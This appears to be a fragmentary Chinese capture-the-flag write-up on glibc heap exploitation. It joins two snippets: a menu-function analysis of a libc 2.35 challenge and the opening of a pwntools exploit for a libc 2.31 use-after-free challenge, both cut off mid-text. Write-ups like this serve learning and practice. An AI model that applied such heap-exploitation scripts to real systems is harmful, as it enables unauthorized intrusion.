文章目录 检查 libc2.35利用adddeleeditshow 思路exp结果 检查 libc2.35 利用 add 0x80个chunk，遍历选一个没有被用的，输入的size<0x501,然后malloc后会清零安装输入的size，然后输入内容，长度也是输入的size dele 指定索引，并判断是否存在，然后free和清零 edit 指定索引，并判断是否

查看保护 查看ida 大致就是只能创建0x60大小的堆块，并且uaf只能利用一次 完整exp： from pwn import*#context(log_level='debug')p=process('./ezheap2.31')def alloc(content):p.sendlineafter(b'4.exit',b'1')p.send(content)def free